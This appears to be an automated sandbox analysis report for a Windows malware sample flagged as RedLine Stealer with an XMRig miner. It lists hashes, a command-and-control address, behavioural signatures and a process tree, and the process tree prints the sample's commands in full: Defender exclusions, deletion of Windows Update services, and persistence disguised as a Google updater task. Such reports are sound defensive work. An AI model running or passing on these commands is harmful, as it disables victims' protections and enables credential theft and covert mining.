Analysis
-
max time kernel
300s -
max time network
291s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
-
submitted
17-10-2022 22:32
General
-
Target
5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe
-
Size
345KB
-
MD5
f1d121ab68b439ac310fb79119ffb044
-
SHA1
f952140c206d96843baa79f2e0e8454c07fa683a
-
SHA256
5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c
-
SHA512
ca0a381a392f9ac1c2954042759955b50e6c1fa735609ac69710658e51c48191f0d99469847b3ebf3f40ce854cb0595387ad986aeacbb5ebd8d05666746e6d6d
-
SSDEEP
6144:GK5lpVV+1MszHze0x/qgMyy4oh5VyrsyaO6enVX9Pv71L8Er8:Hv1YzeDyy4osa6ljQE
Malware Config
Extracted
redline
875784825
79.137.192.6:8362
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
-
XMRig Miner payload 2 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 5 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Themida packer 16 IoCs
Detects Themida, an advanced Windows software protection system.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe"C:\Users\Admin\AppData\Local\Temp\5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#enulbt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#hnkopwq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC5⤵
-
C:\Users\Admin\AppData\Local\Temp\setup23.exe"C:\Users\Admin\AppData\Local\Temp\setup23.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\watchdog.exe"C:\Users\Admin\AppData\Local\Temp\watchdog.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#enulbt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe otevakyhafsyu2⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe yqrjmnkfkjaccxyl GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1hWwoM0PZStk7+MZIko1cmr6CaSv2J5Lcp2RhMWT5VPZ2⤵
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD58c0fbba08bb745c42d267e132a5ccf8b
SHA13ca821e61315e786778828447d4a50e9153ac209
SHA256d8999718d85f8e4737fd3d7879722eb0dc9587e0646783eb1aeb50bde2cbdf59
SHA5129c4d86fc44432652c1a9e2cf632d4e49a0871dca435da98dbdb0140486f05a046d90ccff3d8f87efce990db80669d10153cda051bdefc4f60bfb85272e1379af
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD58c0fbba08bb745c42d267e132a5ccf8b
SHA13ca821e61315e786778828447d4a50e9153ac209
SHA256d8999718d85f8e4737fd3d7879722eb0dc9587e0646783eb1aeb50bde2cbdf59
SHA5129c4d86fc44432652c1a9e2cf632d4e49a0871dca435da98dbdb0140486f05a046d90ccff3d8f87efce990db80669d10153cda051bdefc4f60bfb85272e1379af
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27Filesize
1KB
MD5d6b0775dc8b065f63eb1c316f861073c
SHA106053ace4e90b7b5e5ffd5ea60c508757332669a
SHA25641417649008fbe3872c14d033ea49da0b91898f24030b98f2d587626c3a95d4f
SHA5121bbf1436625d5a62f58ee44ac7dffa65291c727b6129990e0677edced90489ba051a6a325d99b8a232c532b41e7b4af49423d33a911dfab8ba56a93a5b63876c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27Filesize
438B
MD543a63c066a73439a040bea56950ccfe4
SHA17fefb1122e1f30959809ad5d74fe2314aa16c637
SHA2560212b91acb0e438aefcd3556d6acb6f0156d7ab7b0285d98c94a2a34f036530f
SHA51215e4500712c547043a5d42d44ba150287f81cc2cc77cf42700ff35390766d47c592a349c2e2d5054f068c4c6a3000906adcf6adc70c4a0f12b0aab3d97ab4962
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5bbd5c6ddd5db15aaeb644ffa9dfa55be
SHA1e76ab9807493db7d72f3a34a3c6be80fc3dfa0cd
SHA256efe8c5c26584f5e176fc400f6b79493829de64f774807552a6957c3d41718f5e
SHA51216094ac4ceabc056201c7aacafc8268850b3443da4de69b6bb36b9017432850dbc32a9088e3f834d55553f93dcba22f9bf00a647cff91112e44fe1928013b338
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ab33b7f5e6dc7de4f3ede70e0e988355
SHA136353983e9813c769a9c282dcf12a0b7ab786fc2
SHA25693511bf543ba7157d815caa649d796f0be0eeeb03af3bb032af39f35b8d0335e
SHA512119de69d7017f0b817da73994b8edfb8c2ee0c6ed4a28b66fdf9f96e7da60f0ad7ab0780a1a74b41fe2e5fef349202b44637cca1610d00eccb6348f2459fc1a1
-
C:\Users\Admin\AppData\Local\Temp\setup.exeFilesize
7.1MB
MD5d9a08e2b377287b627ceb2df0450899d
SHA199c5f7707141e2b048d2e6f3bb7646e726123f25
SHA256145c38e383cb092c5f4236c44f700c8f43fa06b626386d148f4a5b3b8d2c3fe6
SHA5128b0192e8641ca965eced430d3d4d525cb749f7b5ee1996ccaa964030ef16b012e66ebdef9ed7d9e0af4207f265f57ac25f8f08824d2c1af6c722b286ef5e954b
-
C:\Users\Admin\AppData\Local\Temp\setup.exeFilesize
7.1MB
MD5d9a08e2b377287b627ceb2df0450899d
SHA199c5f7707141e2b048d2e6f3bb7646e726123f25
SHA256145c38e383cb092c5f4236c44f700c8f43fa06b626386d148f4a5b3b8d2c3fe6
SHA5128b0192e8641ca965eced430d3d4d525cb749f7b5ee1996ccaa964030ef16b012e66ebdef9ed7d9e0af4207f265f57ac25f8f08824d2c1af6c722b286ef5e954b
-
C:\Users\Admin\AppData\Local\Temp\setup23.exeFilesize
1.3MB
MD55164546607112f8e62d25d4894705170
SHA18cec1cabfdd23909fa950ab6ff031da5fd6eb570
SHA256390fd4d6b3b9f91adb35954d7985708a70a6acd08b23d3e00038d08ae1416471
SHA512d5b95472b99e6a64e5532aa8e47171083dc90731d476ec1447c951126245f788c337e975111b50023e03d43629defc6b08200fc95d49460e85e134be73d65ebb
-
C:\Users\Admin\AppData\Local\Temp\setup23.exeFilesize
1.3MB
MD55164546607112f8e62d25d4894705170
SHA18cec1cabfdd23909fa950ab6ff031da5fd6eb570
SHA256390fd4d6b3b9f91adb35954d7985708a70a6acd08b23d3e00038d08ae1416471
SHA512d5b95472b99e6a64e5532aa8e47171083dc90731d476ec1447c951126245f788c337e975111b50023e03d43629defc6b08200fc95d49460e85e134be73d65ebb
-
C:\Users\Admin\AppData\Local\Temp\watchdog.exeFilesize
2.5MB
MD5735d324569e557ae7d943929e4ff87e9
SHA1141e0b89202dd8548c01d9ef55b7278222d8126b
SHA2564a3d5ca3d8e5b2e7a981c95b7229cf9d3de168be21c22b1bbfff1ee21b3b712e
SHA512db94ecc52a54309f1eccfb0f6f18c92bd0ef4c4849fe5a528f270262ce2929637c74d63d4959b4e4e4c845d926332f6b5fd3b78a82322871d256f7566d6f1bee
-
C:\Users\Admin\AppData\Local\Temp\watchdog.exeFilesize
2.5MB
MD5735d324569e557ae7d943929e4ff87e9
SHA1141e0b89202dd8548c01d9ef55b7278222d8126b
SHA2564a3d5ca3d8e5b2e7a981c95b7229cf9d3de168be21c22b1bbfff1ee21b3b712e
SHA512db94ecc52a54309f1eccfb0f6f18c92bd0ef4c4849fe5a528f270262ce2929637c74d63d4959b4e4e4c845d926332f6b5fd3b78a82322871d256f7566d6f1bee
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeFilesize
1.3MB
MD55164546607112f8e62d25d4894705170
SHA18cec1cabfdd23909fa950ab6ff031da5fd6eb570
SHA256390fd4d6b3b9f91adb35954d7985708a70a6acd08b23d3e00038d08ae1416471
SHA512d5b95472b99e6a64e5532aa8e47171083dc90731d476ec1447c951126245f788c337e975111b50023e03d43629defc6b08200fc95d49460e85e134be73d65ebb
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeFilesize
1.3MB
MD55164546607112f8e62d25d4894705170
SHA18cec1cabfdd23909fa950ab6ff031da5fd6eb570
SHA256390fd4d6b3b9f91adb35954d7985708a70a6acd08b23d3e00038d08ae1416471
SHA512d5b95472b99e6a64e5532aa8e47171083dc90731d476ec1447c951126245f788c337e975111b50023e03d43629defc6b08200fc95d49460e85e134be73d65ebb
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5573d77d4e77a445f5db769812a0be865
SHA17473d15ef2d3c6894edefd472f411c8e3209a99c
SHA2565ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c
SHA512af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5631f4b3792b263fdda6b265e93be4747
SHA11d6916097d419198bfdf78530d59d0d9f3e12d45
SHA2564e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976
SHA512e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD549d9a9869f0cc7c359df1e335969ada2
SHA1b8a25a1dfe77835063e3296698f74190ed644ce1
SHA256a66d3134dc2e578edc16b066009d8d4a03be3de23180ea20cf1ad8ecb6d6c787
SHA51265d260fcc200042152dcd885940f8352f3b20ac0c3eae01ad1d03d2359de280ea58e5a93a11d563939d0fb812605b06caacd556b76b52d368759b4090fc8c5d2
-
memory/420-269-0x0000000000000000-mapping.dmp
-
memory/756-308-0x0000000000000000-mapping.dmp
-
memory/920-268-0x0000000000000000-mapping.dmp
-
memory/1116-274-0x0000000000000000-mapping.dmp
-
memory/1228-290-0x0000000000000000-mapping.dmp
-
memory/1356-282-0x0000000000000000-mapping.dmp
-
memory/1596-658-0x0000000000000000-mapping.dmp
-
memory/1596-300-0x0000000000000000-mapping.dmp
-
memory/1796-379-0x0000000000380000-0x00000000006EE000-memory.dmpFilesize
3.4MB
-
memory/1796-389-0x0000000000380000-0x00000000006EE000-memory.dmpFilesize
3.4MB
-
memory/1796-512-0x0000000000380000-0x00000000006EE000-memory.dmpFilesize
3.4MB
-
memory/1796-499-0x0000000000380000-0x00000000006EE000-memory.dmpFilesize
3.4MB
-
memory/1844-684-0x0000000000000000-mapping.dmp
-
memory/1848-273-0x0000000000000000-mapping.dmp
-
memory/1936-235-0x0000000000000000-mapping.dmp
-
memory/2148-670-0x0000000000000000-mapping.dmp
-
memory/2208-657-0x0000000000000000-mapping.dmp
-
memory/2236-660-0x0000000000000000-mapping.dmp
-
memory/2236-907-0x00000220FEE90000-0x00000220FEEAC000-memory.dmpFilesize
112KB
-
memory/2236-938-0x00000220FDEB9000-0x00000220FDEBF000-memory.dmpFilesize
24KB
-
memory/2264-228-0x0000000000000000-mapping.dmp
-
memory/2632-661-0x0000000000000000-mapping.dmp
-
memory/2640-230-0x0000000000000000-mapping.dmp
-
memory/3152-272-0x0000000000000000-mapping.dmp
-
memory/3404-683-0x0000000000000000-mapping.dmp
-
memory/3492-390-0x0000000000000000-mapping.dmp
-
memory/3496-679-0x0000000000000000-mapping.dmp
-
memory/3500-680-0x0000000000000000-mapping.dmp
-
memory/3696-315-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmpFilesize
13.0MB
-
memory/3696-126-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmpFilesize
13.0MB
-
memory/3696-124-0x0000000000000000-mapping.dmp
-
memory/3696-127-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmpFilesize
13.0MB
-
memory/3696-128-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmpFilesize
13.0MB
-
memory/3696-129-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmpFilesize
13.0MB
-
memory/3696-130-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmpFilesize
13.0MB
-
memory/3696-131-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmpFilesize
13.0MB
-
memory/3696-147-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmpFilesize
1.9MB
-
memory/3696-133-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmpFilesize
1.9MB
-
memory/3696-132-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmpFilesize
13.0MB
-
memory/3696-134-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmpFilesize
13.0MB
-
memory/3696-311-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmpFilesize
1.9MB
-
memory/3772-339-0x0000000000000000-mapping.dmp
-
memory/3832-120-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/3832-119-0x0000000140003FAC-mapping.dmp
-
memory/3832-123-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/3832-392-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/3832-122-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/3832-121-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/3832-118-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/3920-497-0x00007FF6C0A60000-0x00007FF6C1759000-memory.dmpFilesize
13.0MB
-
memory/3920-346-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmpFilesize
1.9MB
-
memory/3920-498-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmpFilesize
1.9MB
-
memory/3920-345-0x00007FF6C0A60000-0x00007FF6C1759000-memory.dmpFilesize
13.0MB
-
memory/3920-951-0x00007FF8916E0000-0x00007FF8918BB000-memory.dmpFilesize
1.9MB
-
memory/3920-950-0x00007FF6C0A60000-0x00007FF6C1759000-memory.dmpFilesize
13.0MB
-
memory/3940-682-0x0000000000000000-mapping.dmp
-
memory/3964-681-0x0000000000000000-mapping.dmp
-
memory/4368-500-0x0000000000000000-mapping.dmp
-
memory/4368-517-0x0000027344BF0000-0x0000027344C0C000-memory.dmpFilesize
112KB
-
memory/4368-537-0x000002735E1C0000-0x000002735E279000-memory.dmpFilesize
740KB
-
memory/4368-570-0x0000027344C10000-0x0000027344C1A000-memory.dmpFilesize
40KB
-
memory/4396-248-0x0000000000000000-mapping.dmp
-
memory/4412-245-0x0000000000000000-mapping.dmp
-
memory/4500-258-0x0000000000000000-mapping.dmp
-
memory/4568-264-0x0000000000000000-mapping.dmp
-
memory/4604-254-0x0000000000000000-mapping.dmp
-
memory/4752-664-0x0000000000000000-mapping.dmp
-
memory/4796-171-0x0000000077550000-0x00000000776DE000-memory.dmpFilesize
1.6MB
-
memory/4796-204-0x0000000077550000-0x00000000776DE000-memory.dmpFilesize
1.6MB
-
memory/4796-246-0x0000000077550000-0x00000000776DE000-memory.dmpFilesize
1.6MB
-
memory/4796-226-0x0000000000D90000-0x00000000010FE000-memory.dmpFilesize
3.4MB
-
memory/4796-168-0x0000000077550000-0x00000000776DE000-memory.dmpFilesize
1.6MB
-
memory/4796-243-0x0000000077550000-0x00000000776DE000-memory.dmpFilesize
1.6MB
-
memory/4796-225-0x0000000077550000-0x00000000776DE000-memory.dmpFilesize
1.6MB
-
memory/4796-223-0x0000000077550000-0x00000000776DE000-memory.dmpFilesize
1.6MB
-
memory/4796-240-0x0000000077550000-0x00000000776DE000-memory.dmpFilesize
1.6MB
-
memory/4796-221-0x0000000077550000-0x00000000776DE000-memory.dmpFilesize
1.6MB
-
